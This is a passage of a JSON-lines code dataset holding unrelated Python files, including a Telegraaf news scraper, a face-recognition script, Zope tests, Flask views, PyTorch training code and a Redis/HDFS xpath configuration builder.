'didomi_token':'eyJ1c2VyX2lkIjoiMTcxMTBiMzMtMTBjYS02YTViLWFkNDAtMmQwMGFjNGJlZTY2IiwiY3JlYXRlZCI6IjIwMjAtMDMtMjVUMDc6NTg6MzEuMjA4WiIsInVwZGF0ZWQiOiIyMDIwLTAzLTI1VDA3OjU4OjUwLjk0OFoiLCJ2ZW5kb3JzIjp7ImVuYWJsZWQiOlsiZ29vZ2xlIiwiZmFjZWJvb2siLCJjOm5sLXByb2ZpZWwiXSwiZGlzYWJsZWQiOltdfSwicHVycG9zZXMiOnsiZW5hYmxlZCI6WyJmdW5jdGlvbmVlbCIsInNvY2lhbF9tZWRpYSIsIm5sX3Byb2ZpZWwiLCJjb29raWVzIiwiYWR2ZXJ0aXNpbmdfcGVyc29uYWxpemF0aW9uIiwiY29udGVudF9wZXJzb25hbGl6YXRpb24iLCJhZF9kZWxpdmVyeSIsImFuYWx5dGljcyJdLCJkaXNhYmxlZCI6W119fQ==',\n 'euconsent': 'BOwzpeIOwzphNAHABBNLC--AAAAuhr_7__7-_9_-_f__9uj3Or_v_f__32ccL59v_h_7v-_7fi_20nV4u_1vft9yfk1-5ctDztp507iakivXmqdeb9v_nz3_5pxP78k89r7337Ew_v8_v-b7BCON_YxEiA',\n 'OB-USER-TOKEN': '82e48dea-c07a-420c-a5e2-cece4269fb48',\n 'paywallversion': '1',\n}\n\ndef create_cookie(domain, name, value):\n return {\n \"name\": name,\n \"value\": value,\n \"domain\": domain,\n }\n\nsession = requests.session()\nfor name, value in COOKIES.items():\n session.cookies.set(**create_cookie(\"www.telegraaf.nl\", name, value))\nr = session.get(\"https://www.telegraaf.nl/nieuws/1071777683/pvd-a-ers-houden-samengaan-met-groen-links-af\")\nr.raise_for_status()\n#\n# print(\"aantal nieuwe bevestigde besmettingen\" in r.text)\n# open(\"/tmp/test.html\", \"w\").write(r.text)\n# sys.exit()\n#links = [\"https://www.nu.nl/coronavirus/6039788/kinderen-thuis-in-coronatijd-zoek-de-lichtpuntjes-ga-geen-schooltje-spelen.html\"]\n\n\n\ndb = \"landelijkemedia.db\"\nconn = create_connection(db)\nlinks = get_links(conn)\nfrom amcatclient import AmcatAPI\nc = AmcatAPI(\"http://vu.amcat.nl\")\n#links=['https://www.telegraaf.nl/nieuws/321571165/tientallen-bedolven-door-instorten-quarantainehotel-in-china']\nfor l in links:\n print(l)\n if 'video' in l:\n continue\n if 'redirect' in l:\n continue\n meta = get_meta(conn, l)\n if 'Liveblog' in meta['title']:\n continue\n a = scrape_article(session, l)\n if not a:\n continue\n else:\n a.update(meta)\n c.create_articles(2, 1385, [a])\n\n","sub_path":"telegraaf_rssfeed.py","file_name":"telegraaf_rssfeed.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"73909770","text":"# follow.py\n#\n# Watch a log file (stocks in this case)\n\nimport os\nimport time\n\ndef follow(filename):\n f = open(filename, 'r')\n f.seek(0, os.SEEK_END)\n\n while True:\n line = f.readline() \n if not line:\n time.sleep(0.1)\n continue # Retry\n yield line # Emit a line\n\nimport csv\n\ndef parse_stock_data(lines):\n rows = csv.reader(lines)\n types = [str, float, str, str, float, float, float, float, int]\n converted = ( [func(val) for func, val in zip(types, row)] for row in rows)\n return converted\n\nlines = follow('Data/stocklog.csv')\nrows = parse_stock_data(lines)\nnegchange = (row for row in rows if row[4] < 0)\nfor row in negchange:\n name = row[0]\n price = row[1]\n change = row[4]\n print('{:>10s} {:>10.2f} {:>10.2f}'.format(name, price, change))\n","sub_path":"code/live/follow.py","file_name":"follow.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"170637426","text":"import face_recognition\nfrom sklearn import svm\nimport os\nencodings = []\nnames = []\ntrain_dir = os.listdir('./lfw/')\nprint(\"train_dir:\",train_dir)\nfor person in train_dir:\n pix = os.listdir(\"./lfw/\" + person)\n for person_img in pix:\n face = face_recognition.load_image_file(\"./lfw/\" + person + \"/\" + person_img)\n 
face_locations=face_recognition.face_locations(face)\n print(face_locations)\n if len(face_locations)==1:\n face_enc = face_recognition.face_encodings(face)[0]\n print(\"person:\",person)\n print(\"face_enc:\",face_enc)\n encodings.append(face_enc)\n names.append(person)\n else:\n print(person+\"can not used for tarining\")\nclf = svm.SVC(gamma='scale')\nclf.fit(encodings, names)\ntest_image = face_recognition.load_image_file('Aaron_peirsol-2.jpg')\nface_locations = face_recognition.face_locations(test_image)\nno = len(face_locations)\n\nprint(\"Number of faces detected: \", no)\nprint(\"Found: \\n\")\nfor i in range(no):\n test_image_enc = face_recognition.face_encodings(test_image)[i]\n name = clf.predict([test_image_enc])\n print(*name)\n","sub_path":"PycharmProjects/0429_new/person2.py","file_name":"person2.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"538116693","text":"##############################################################################\n#\n# Copyright (c) 2001, 2002 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Row class tests.\n\n$Id$\n\"\"\"\n\nfrom unittest import TestCase, main, makeSuite\n\nclass RowTests(TestCase):\n\n def test_RowClassFactory(self):\n from zope.rdb import RowClassFactory\n\n columns = ('food', 'name')\n data = ('pizza', 'john')\n\n klass = RowClassFactory(columns)\n ob = klass(data)\n\n self.failUnless(ob.food == 'pizza', \"bad row class attribute\")\n self.failUnless(ob.name == 'john', \"bad row class attribute (2)\")\n\n def test_RowClassFactory_Proxied(self):\n from zope.rdb import RowClassFactory\n from zope.security.proxy import ProxyFactory\n from zope.security.interfaces import ForbiddenAttribute\n from zope.security.interfaces import IChecker\n\n columns = ('type', 'speed')\n data = ('airplane', '800km')\n\n klass = RowClassFactory(columns)\n\n ob = klass(data)\n\n proxied = ProxyFactory(ob)\n\n self.failUnless (proxied.type == 'airplane', \"security proxy error\")\n self.failUnless (proxied.speed == '800km', \"security proxy error (2)\")\n self.assertRaises(ForbiddenAttribute, getattr, proxied, '__slots__')\n\n # Indirectly, check the the __Security_checker__ attribute has been\n # applied only to the instance, and not to the class.\n self.assertRaises(ForbiddenAttribute, getattr, proxied, '__bases__')\n proxied_class = ProxyFactory(klass)\n proxied_class.__bases__\n\n # Check __Security_checker__ directly\n self.assertRaises(AttributeError,\n getattr, klass, '__Security_checker__')\n self.assert_(IChecker.providedBy(ob.__Security_checker__))\n\n def test__cmp__(self):\n from zope.rdb import RowClassFactory\n\n columns = ('food', 'name')\n data = ('pizza', 'john')\n\n klass = RowClassFactory(columns)\n ob = klass(data)\n self.assertEqual(ob, ob, \"not equal to self\")\n\n klass2 = RowClassFactory(columns)\n ob2 = klass2(data)\n self.assertEqual(ob, ob2, \"not equal to an identical class\")\n\n columns = ('food', 'surname')\n data = ('pizza', 
'john')\n\n klass3 = RowClassFactory(columns)\n ob3 = klass3(data)\n self.assert_(ob < ob3, \"cmp with different columns\")\n\n columns = ('food', 'name')\n data = ('pizza', 'mary')\n\n klass4 = RowClassFactory(columns)\n ob4 = klass4(data)\n self.assert_(ob < ob4, \"cmp with different data\")\n\n def test_InstanceOnlyDescriptor(self):\n from zope.rdb import InstanceOnlyDescriptor\n inst = object() # could be anything\n cls = object # could be any class\n d = InstanceOnlyDescriptor()\n self.assertRaises(AttributeError, d.__get__, inst, cls)\n self.assertRaises(AttributeError, d.__get__, None, cls)\n self.assertRaises(AttributeError, d.__delete__, inst)\n d.__set__(inst, 23)\n self.assertEquals(d.__get__(inst, cls), 23)\n self.assertRaises(AttributeError, d.__get__, None, cls)\n d = InstanceOnlyDescriptor(23)\n self.assertEquals(d.__get__(inst, cls), 23)\n d.__delete__(inst)\n self.assertRaises(AttributeError, d.__get__, inst, cls)\n self.assertRaises(AttributeError, d.__get__, None, cls)\n self.assertRaises(AttributeError, d.__delete__, inst)\n\n\ndef test_suite():\n return makeSuite(RowTests)\n\nif __name__=='__main__':\n main(defaultTest='test_suite')\n","sub_path":"zope.rdb/branches/3.5/src/zope/rdb/tests/test_row.py","file_name":"test_row.py","file_ext":"py","file_size_in_byte":4075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"410577965","text":"# Palindrome Partitioning\n# Author: Pavan Kumar Paluri\n# Dynamic Programming using Memoization method\n# Leetcode Question: https://leetcode.com/problems/palindrome-partitioning/\n\n# Time and Space Complexity: O(N*2^N), O(N^2)\n\nclass Solution:\n def partition(self, s: str) -> List[List[str]]:\n '''\n given a string, generate all possible palindrome outputs\n '''\n result =[]\n # 2d boolean array for storing start and i's\n dp = [[False for _ in range(len(s))] for _ in range(len(s))]\n # dfs_bt \n def is_palindrome(s, low, high):\n while low < high:\n if s[low]==s[high]:\n low+=1\n high-=1\n else:\n return False \n return True\n def dfs_backtracking(start, current, s):\n \n # Stopping condition\n \n if start >= len(s):\n result.append(current[:])\n \n # backtrack\n for i in range(start, len(s)):\n \n # If it is a palindrome --> condition still needs to be added\n if s[start]==s[i] and (i-start<=2 or dp[start+1][i-1]):\n #if is_palindrome(s, start, i):\n dp[start][i] = True\n current.append(s[start:i+1])\n dfs_backtracking(i+1, current, s)\n current.pop()\n \n dfs_backtracking(0, [], s)\n return result\n","sub_path":"Python/Palindromes/Palindrome_Partitioning.py","file_name":"Palindrome_Partitioning.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"611882765","text":"from managers import Manager, entity_list, entity_write, entity_single\n\n\n\n\nclass GameManager(Manager):\n\n\n\t@entity_list()\n\tdef get_games(self):\n\t\tcursor = self.db.cursor()\n\t\tcursor.execute(\"\"\"\n\t\t\tSELECT \n\t\t\t\tid, title, price, description, developer, genre\n\t\t\tFROM\n\t\t\t\tgame \n\t\t\"\"\")\n\t\tresults = cursor.fetchall()\n\t\treturn cursor, results\n\n\t@entity_single()\n\tdef get_game(self, id):\n\t\tcursor = self.db.cursor()\n\t\tcursor.execute(\"\"\"\n\t\t\tSELECT \n\t\t\t\tid, title, price, description, developer, genre\n\t\t\tFROM\n\t\t\t\tgame \n\t\t\tWHERE id = %s\n\t\t\"\"\", (id,))\n\t\tresults = cursor.fetchall()\n\t\treturn cursor, results\n\n\t@entity_write()\n\tdef 
insert_game(self, vals):\n\t\tcursor = self.db.cursor()\n\t\tcursor.execute(\"\"\"\n\t\t\tINSERT INTO game(title, price, description, developer, genre)\n\t\t\tVALUES(%s, %s, %s, %s, %s)\n\t\t\t\"\"\", (\n\t\t\t\tvals['title'],\n\t\t\t\tvals['price'],\n\t\t\t\tvals['description'],\n\t\t\t\tvals['developer'],\n\t\t\t\tvals['genre']\n\t\t\t\t)\n\t\t\t)\n\t\treturn self.db, cursor","sub_path":"database/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388218182","text":"from flask import render_template, redirect, url_for\nfrom . import usuario\nfrom .forms import CadastroUsuarioForm, EditUsuarioForm\nfrom ..models import Usuario\nfrom .. import db\nfrom flask_login import login_required\n\n\n@usuario.route('/usuarios')\n@login_required\ndef index():\n users = Usuario.query.all()\n return render_template('usuario/lista.html', users=users)\n\n\n@usuario.route('/usuario/cadastro', methods=['GET', 'POST'])\n@login_required\ndef cadastro():\n usuarioForm = CadastroUsuarioForm()\n if usuarioForm.validate_on_submit():\n user = Usuario()\n user.nome = usuarioForm.nome.data\n user.sobrenome = usuarioForm.sobrenome.data\n user.email = usuarioForm.email.data\n db.session.add(user)\n db.session.commit()\n return redirect(url_for('usuario.index'))\n return render_template('usuario/cadastro.html', form=usuarioForm)\n\n\n@usuario.route('/usuario/delete/')\n@login_required\ndef delete(id):\n user = Usuario.query.get_or_404(id)\n db.session.delete(user)\n db.session.commit()\n return redirect(url_for('usuario.index'))\n\n\n@usuario.route('/usuario/editar/', methods=['GET', 'POST'])\n@login_required\ndef edit(id):\n user = Usuario.query.get_or_404(id)\n usuarioForm = EditUsuarioForm(user=user)\n if usuarioForm.validate_on_submit():\n user.nome = usuarioForm.nome.data\n user.sobrenome = usuarioForm.sobrenome.data\n db.session.add(user)\n db.session.commit()\n return redirect(url_for('usuario.index'))\n usuarioForm.nome.data = user.nome\n usuarioForm.sobrenome.data = user.sobrenome\n return render_template('usuario/editar.html', form=usuarioForm)\n","sub_path":"app/usuario/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"87807998","text":"import torch\nimport numpy as np\nimport os\nimport argparse\nimport datetime\nfrom tensorboardX import SummaryWriter\nfrom data.load_radio_ml import get_radio_ml_loader as get_loader\nfrom data.data_utils import iq2spiketrain as to_spike_train\nimport matplotlib.pyplot as plt\nimport tqdm\nfrom mpl_toolkits import mplot3d\n\n\nif __name__ == '__main__':\n classes = ['32PSK', '16APSK', '32QAM', 'FM', 'GMSK', '32APSK', 'OQPSK', '8ASK', 'BPSK', '8PSK', 'AM-SSB-SC', '4ASK',\n '16PSK', '64APSK', '128QAM', '128APSK', 'AM-DSB-SC', 'AM-SSB-WC', '64QAM', 'QPSK', '256QAM', 'AM-DSB-WC',\n 'OOK', '16QAM']\n\n modulation_idx = classes.index('32PSK') # OOK 32PSK 64QAM\n\n torch.manual_seed(123)\n np.random.seed(123)\n\n get_loader_kwargs = {}\n to_st_train_kwargs = {}\n\n # Set \"get loader\" kwargs\n get_loader_kwargs['data_dir'] = '/mnt/013c8c34-4de2-4dab-9e29-16618f093336/playground/RFSNN/2018.01'\n get_loader_kwargs['min_snr'] = 6\n get_loader_kwargs['max_snr'] = 6\n get_loader_kwargs['per_h5_frac'] = 0.25\n get_loader_kwargs['train_frac'] = 0.9\n get_loader_kwargs['per_sample_frac'] = 1.0\n get_loader_kwargs['normalize'] = True\n 
get_loader_kwargs['fake_height'] = False\n get_loader_kwargs['skip_1'] = False\n get_loader_kwargs['classes'] = 24\n # Set \"to spike train\" kwargs\n\n wh = 16\n to_st_train_kwargs['out_w'] = wh #args.I_resolution\n to_st_train_kwargs['out_h'] = wh #args.Q_resolution\n\n train_data = get_loader(24, train=True, **get_loader_kwargs)\n gen_train = iter(train_data)\n\n fig, ax = plt.subplots(2, 1)\n plt.ion()\n plt.show()\n for step in range(10):\n try:\n input, labels = next(gen_train)\n except StopIteration:\n gen_train = iter(train_data)\n input, labels = next(gen_train)\n\n input_spikes = to_spike_train(input, **to_st_train_kwargs)\n\n for idx in range(24):\n if labels[idx] == modulation_idx:\n img = None\n im3d = np.zeros((1024, wh, wh), dtype=np.uint8)\n for i in range(1024):\n\n im3d[i] = input_spikes[idx, i, 0, :, :]\n if False:\n ax[0].clear()\n ax[1].clear()\n if img is None:\n img = input_spikes[idx, i, 0, :, :]\n else:\n img += input_spikes[idx, i, 0, :, :]\n ax[0].imshow(img)\n ax[0].title.set_text(classes[labels[idx]])\n xx = input[idx, 0, i] * 2 - 1\n yy = input[idx, 1, i] * 2 - 1\n ax[1].scatter(xx, -1 * yy)\n ax[1].set_xlim(-1, 1)\n ax[1].set_ylim(-1, 1)\n plt.pause(0.0001)\n print(\"done\")\n pos = np.where(im3d == 1)\n fig2 = plt.axes(projection='3d')\n fig2.scatter3D(pos[0], pos[1], pos[2], c=pos[0])\n ys = np.arange(0,512)\n plt.figure()\n plt.plot(np.array(input[idx,0])[0:512],ys, 'g')\n plt.plot(np.array(input[idx,1])[0:512],ys, 'b')\n plt.pause(100)\n","sub_path":"rf2/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219375770","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# This document is free and open-source software, subject to the OSI-approved\n# BSD license below.\n#\n# Copyright (c) 2011 - 2013 Alexis Petrounias ,\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the author nor the names of its contributors may be used\n# to endorse or promote products derived from this software without specific\n# prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\nimport os\nfrom io import open\n\nfrom setuptools import find_packages, setup\n\n\ndef read(filename):\n path = os.path.join(os.path.dirname(__file__), filename)\n with open(path, encoding='utf-8') as handle:\n return handle.read()\n\n\nsetup(\n name='django-cte-forest',\n version=__import__('cte_forest').__version__,\n description=(\n 'Django Adjacency-List trees using PostgreSQL'\n ' Common Table Expressions (CTE).'\n ),\n long_description=read('README.rst'),\n maintainer='Matthias Kestenholz',\n maintainer_email='mk@feinheit.ch',\n url='https://github.com/matthiask/django-cte-forest',\n license='BSD License',\n packages=find_packages(\n exclude=['cte_forest_test'],\n ),\n include_package_data=True,\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"170908468","text":"import os\r\nimport sys\r\nimport torch\r\nimport torch.autograd as autograd\r\nimport torch.nn.functional as F\r\n\r\ndef save(model, save_dir, save_prefix, steps):\r\n if not os.path.isdir(save_dir):\r\n os.makedirs(save_dir)\r\n save_prefix = os.path.join(save_dir,save_prefix)\r\n save_path = '{}_steps_{}.pt'.format(save_prefix,steps)\r\n torch.save(model.state_dict(),save_path)\r\n\r\n\r\ndef train(train_iter, dev_iter, model, args):\r\n '''\r\n your code here.\r\n \r\n training process using backpropagation.\r\n print training loss and accuracy at args.log_interval.\r\n print evaluation loss and accuray at args.test_interval.\r\n Save the best model.\r\n \r\n Hint: view the size of data from train_iter before using them.\r\n Optional: Implement early stopping/dropout/L2 penalty.\r\n '''\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)\r\n steps = 0\r\n best_acc = 0\r\n last_step = 0\r\n model.train()\r\n for epoch in range(1, args.epochs+1):\r\n for batch in train_iter:\r\n feature, target = batch.text, batch.label\r\n #print(type(feature.data))\r\n #print(feature.data.shape)\r\n f = torch.t(feature.data) \r\n optimizer.zero_grad()\r\n logit = model(f)\r\n target.data = target.data-1\r\n loss = F.cross_entropy(logit, target)\r\n loss.backward()\r\n optimizer.step()\r\n steps += 1\r\n if steps % args.log_interval == 0:\r\n result = torch.max(logit,1)[1].view(target.size())\r\n corrects = (result.data == target.data).sum()\r\n accuracy = corrects*100.0/batch.batch_size\r\n sys.stdout.write('\\rBatch[{}] - loss: {:.6f} acc: {:.4f}%({}/{})'.format(steps,\r\n loss.data.item(),\r\n accuracy,\r\n corrects,\r\n batch.batch_size))\r\n if steps % args.log_interval == 0:\r\n dev_acc = 
eval(dev_iter, model, args)\r\n if dev_acc > best_acc:\r\n best_acc = dev_acc\r\n last_step = steps\r\n if args.save_best:\r\n save(model,args.save_dir,'best',steps)\r\n else:\r\n if steps - last_step >= args.early_stop:\r\n print('early stop by {} steps.'.format(args.early_stop))\r\n elif steps % args.save_interval == 0:\r\n save(model,args.save_dir,args.snapshot,steps)\r\n\r\n\r\ndef eval(dev_iter, model, args):\r\n '''\r\n your code here.\r\n evaluation of the model.\r\n \r\n Hint: To save the best model and do earily stopping,\r\n you need to return the evaluation accuracy to train function.\r\n '''\r\n model.eval()\r\n corrects, avg_loss = 0,0\r\n for batch in dev_iter:\r\n feature, target = batch.text, batch.label\r\n f = torch.t(feature.data) \r\n logit = model(f)\r\n target.data = target.data-1\r\n loss = F.cross_entropy(logit,target)\r\n avg_loss += loss.data.item()\r\n result = torch.max(logit,1)[1]\r\n corrects += (result.view(target.size()).data == target.data).sum()\r\n size = len(dev_iter.dataset)\r\n avg_loss /= size \r\n accuracy = 100.0 * corrects/size\r\n print('\\nEvaluation - loss: {:.6f} acc: {:.4f}%({}/{}) \\n'.format(avg_loss,accuracy,corrects,size))\r\n \r\n return accuracy\r\n\r\n\r\n","sub_path":"homework5/YulinChen/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"387359611","text":"# Попросить пользователя ввести слово только из букв.\n\ndef enter_word():\n while True:\n s = input(\"Please enter an alphabetic word.\\n\")\n s = s.strip()\n if s.isalpha():\n return s\n\n\nword = enter_word()\nassert word.isalpha(), \"Word is not alphabetic.\"\nprint(word)\n\n","sub_path":"Practice1.py","file_name":"Practice1.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"504271677","text":"# -*- encoding: utf-8 -*-\n'''\nCreated on 2017/7/1 13:49\nCopyright (c) 2017/7/1, 海牛学院版权所有.\n@author: 青牛\n'''\nimport sys\n\nsys.path.append('/home/qingniu/hainiu_crawler')\n\nfrom commons.util.db_util import DBUtil\nfrom commons.util.log_util import LogUtil\nfrom commons.util.file_util import FileUtil\nfrom commons.util.time_util import TimeUtil\nfrom hdfs.client import Client\nfrom configs import config\nimport time, sys, redis\n\n\ndef xpath_config_file():\n select_xpath_rule_sql = \"\"\"select host,xpath,type from stream_extract_xpath_rule where host='%s' and status=0\"\"\"\n rl = LogUtil().get_base_logger()\n try:\n # _HAINIU_DB = {'HOST': '192.168.137.190', 'USER': 'hainiu', 'PASSWD': '12345678', 'DB': 'hainiucrawler',\n # 'CHARSET': 'utf8', 'PORT': 3306}\n d = DBUtil(config._HAINIU_DB)\n #d = DBUtil(_HAINIU_DB)\n r = redis.Redis('nn1.hadoop', 6379, db=6)\n #r = redis.Redis('redis.hadoop', 6379, db=6)\n f = FileUtil()\n t = TimeUtil()\n c = Client(\"http://nn1.hadoop:50070\")\n\n time_str = t.now_time(format='%Y%m%d%H%M%S')\n #local_xpath_file_path = '/Users/leohe/Data/input/xpath_cache_file/xpath_file' + time_str\n local_xpath_file_path = '/home/qingniu/xpath_cache_file/xpath_file' + time_str\n\n start_cursor = 0\n is_finish = True\n starttime = time.clock()\n host_set = set()\n\n while is_finish:\n values = set()\n limit = r.scan(start_cursor,'total:*',10)\n if limit[0] == 0:\n is_finish = False\n start_cursor = limit[0]\n for h in limit[1]:\n host = h.split(\":\")[1]\n total_key = h\n txpath_key = 'txpath:%s' % host\n fxpath_key = 'fxpath:%s' % host\n total = 
r.get(total_key)\n\n txpath = r.zrevrange(txpath_key, 0, 1)\n row_format = \"%s\\t%s\\t%s\\t%s\"\n if txpath:\n # print 'txpath:%s' % txpath\n txpath_num = int(r.zscore(txpath_key, txpath[0]))\n if txpath.__len__() == 2:\n txpath_num_1 = int(r.zscore(txpath_key, txpath[1]))\n txpath_num_1 = txpath_num_1 if txpath_num_1 is not None else 0\n\n # print 'txpath_max_num:%s' % txpath_num\n if txpath_num / float(total) >= 0.8:\n values.add(row_format % (host, txpath[0], 'true', '0'))\n host_set.add(host)\n else:\n if txpath_num >= 1:\n values.add(row_format % (host, txpath[0], 'true', '0'))\n host_set.add(host)\n if txpath_num_1 is not None and txpath_num_1 >= 1:\n values.add(row_format % (host, txpath[1], 'true', '0'))\n host_set.add(host)\n\n fxpath = r.smembers(fxpath_key)\n if fxpath:\n # print 'fxpath:%s' % fxpath\n for fx in fxpath:\n values.add(row_format % (host, fx, 'false', '0'))\n host_set.add(host)\n\n sql = select_xpath_rule_sql % host\n list_rule = d.read_tuple(sql)\n for rule in list_rule:\n type = rule[2]\n if type == 0:\n values.add(row_format % (rule[0], rule[1], 'true', '2'))\n host_set.add(host)\n elif type == 1:\n values.add(row_format % (rule[0], rule[1], 'false', '3'))\n host_set.add(host)\n\n f.write_file_line_pattern(local_xpath_file_path, values, \"a\")\n #上传到HDFS的XPATH配置文件目录\n c.upload(\"/user/qingniu/xpath_cache_file/\", local_xpath_file_path)\n endtime = time.clock()\n worksec = int(round((endtime - starttime)))\n rl.info('total host %s,action time %s\\'s' % (host_set.__len__(), worksec))\n except:\n rl.exception()\n d.rollback()\n finally:\n d.close()\n\n\nif __name__ == '__main__':\n reload(sys)\n sys.setdefaultencoding('utf-8')\n xpath_config_file()\n","sub_path":"src/main/resources/xpath_config.py","file_name":"xpath_config.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"548417195","text":"import pandas as pd\nimport os\nimport simplejson as json\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom sklearn.cluster import KMeans\nfrom sklearn.neighbors import NearestNeighbors\nimport sklearn\nfrom sklearn import preprocessing\nfrom numpy import inf\nfrom sklearn.decomposition import PCA\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import LSTM\nfrom tensorflow.keras.layers import Dropout\nimport time\n\n# linear regression for multioutput regression\nfrom sklearn.datasets import make_regression\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge \n\n## Calculating Average. 
value of a list\ndef Average_val(lst):\n return sum(lst) / len(lst)\n\n## Normalizing feature vectors\ndef Normalize_feature(feat_df, PCA_option): \n if PCA_option == 'No':\n x = feat_df #.values \n else:\n x = feat_df \n min_max_scaler = preprocessing.MinMaxScaler()\n x_scaled = min_max_scaler.fit_transform(x)\n res = pd.DataFrame(x_scaled)\n \n return res\n\n### Check about empty files of a directory \ndef Check_Empty_Files(dirName):\n \n # Create a List \n listOfEmptyDirs = list()\n\n # Iterate over the directory tree and check if directory is empty.\n for (dirpath, dirnames, filenames) in os.walk(dirName):\n if len(dirnames) == 0 and len(filenames) == 0 :\n listOfEmptyDirs.append(dirpath)\n\n### Get Meta-Features matrix for the training and testing \ndef Get_Meta_Features (meta_feat_dir, data_list, data_type):\n \n df_meta_feat = pd.DataFrame()\n \n if data_type == 'Uni-var':\n \n for file_name in data_list:\n print(file_name)\n df = pd.read_csv(meta_feat_dir + file_name +'.csv', error_bad_lines=False, header = None)\n last_row = df.tail(1)\n df_meta_feat = df_meta_feat.append(last_row, ignore_index=True)\n df_meta_feat = df_meta_feat.fillna(0)\n \n \n return df_meta_feat\n\n '''\n else: \n for file_name in all_datasets_list:\n cnt = 0\n results_vec = []\n if '.DS_Store' not in file_name:\n cnt += 1\n all_models_list = os.listdir(win_res_dir_name + '/' + dir_name + '/' + file_name) \n \n \n for model_name in all_models_list:\n df = pd.read_csv(win_res_dir_name + '/' + dir_name+'/'+file_name+'/'+model_name, error_bad_lines=False, header = None)\n results_vec.append(df.iloc[0,-1])\n \n best_model_dataset_index = results_vec.index(min(results_vec))\n print(file_name + ':' + arr_models[best_model_dataset_index + 1])\n \n ## Append Best Model for each dataset variable to the vector\n a.append(best_model_dataset_index + 1)\n \n results_vec.insert(0,dir_name+'_'+file_name)\n \n numpy_perf_vec = np.array(results_vec).reshape((1, len(all_models_list)+1)) \n numpy_perf_list = numpy_perf_vec.tolist()\n \n wtr_perf.writerow (numpy_perf_list)\n \n return a \n''' \n \n### Get the best model for specific dataset (Used for ALgros baseline)\ndef Get_All_Model_Dataset(data_name, win_res_dir_name, data_type):\n \n arr_models = os.listdir(win_res_dir_name + '/' + data_name)\n \n all_models_list = os.listdir(win_res_dir_name + '/' + data_name) \n \n results_vec_mse = []\n results_vec_mape = []\n results_vec_smape = []\n for model_name in all_models_list:\n df = pd.read_csv(win_res_dir_name + '/' + data_name+'/'+ model_name, error_bad_lines=False, header = None)\n results_vec_mse.append(df.iloc[0,-1])\n 